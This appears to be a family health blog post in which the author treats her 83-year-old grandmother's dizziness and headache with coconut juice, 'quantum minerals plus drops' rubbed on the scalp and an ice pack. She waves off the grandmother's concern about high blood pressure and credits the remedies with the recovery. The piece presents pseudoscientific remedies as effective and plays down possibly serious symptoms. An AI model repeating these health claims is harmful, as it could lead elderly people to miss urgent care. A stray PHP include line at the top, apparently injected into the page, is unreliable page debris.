@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Drug asking grandma gets coconut juice, quantum minerals plus drops and an ice pack for her dizzy spell and headache - My Family Health Blog

Drug asking grandma gets coconut juice, quantum minerals plus drops and an ice pack for her dizzy spell and headache

I picked up my sick 83 year old grandmother Sunday late afternoon so she could join us for dinner to celebrate my child and her great grandchild’s 4 year old birthday.  Almost home while still in the car she was asking for a drug named Bonamine.  She said it was for feeling sick while travelling in a vehicle.  I said we had no drugs at home.  She asked for vicks vapor rub.  I said we had none of that at home either.

We got home and immediately I had her drinking freshly opened fresh coconut juice, put 5 drops of quantum minerals plus drops on the top of her head and massaged it, and put an ice pack on her head.  She was blabbering about maybe she is suffering from high blood pressure.  I dismissed it and said she just needed fresh air because we drove windows closed with just the air conditioner.  She needs more oxygen.

A few minutes later some 15 minutes her headache and dizzy spell had subsided.  She got a taste of what we know.  Cultural differences.  She enjoyed watching some 10 children laugh and play as the centerpiece of the party.  She forgot her worries and walked a little stronger on the way back to ride the car.  I was with her twice in the restroom when she had to take a pee.  I noticed that our restrooms are not elderly injured friendly.

On the way to take her home we drove with the windows open so she does not get dizzy again.

I asked my 7 year old boy this morning if he was going to take care of me when I grow old and sick like his great grandmother.  He said he doesn’t need to do that.  I asked why?  He said I was knowledgable in health – healthy stuff so I won’t degenerate like that.  I hope my boy is right.